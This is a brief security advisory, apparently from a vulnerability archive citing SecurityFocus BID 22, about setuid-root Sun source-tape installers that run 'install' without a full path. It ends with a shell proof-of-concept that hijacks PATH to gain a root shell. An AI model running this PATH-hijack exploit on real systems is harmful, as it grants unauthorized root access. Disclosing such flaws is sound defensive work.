16 lines
No EOL
695 B
Text
16 lines
No EOL
695 B
Text
source: https://www.securityfocus.com/bid/22/info
|
|
|
|
This applies to sites that have installed Sun Source tapes only.
|
|
|
|
The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both binary files which exec other programs: "make -k install" (makeinstall) or "install" (winstall) without a full path or reseting the PATH enviroment variable.
|
|
|
|
This makes it possible for users on that system to become root.
|
|
|
|
$ cp /bin/sh /tmp/sh
|
|
$ echo chmod 4777 /tmp/sh > /tmp/install
|
|
$ chmod a+rx /tmp/install
|
|
$ set PATH=/tmp:$PATH
|
|
$ export PATH
|
|
$ /usr/bin/winstall
|
|
$ /tmp/sh
|
|
# |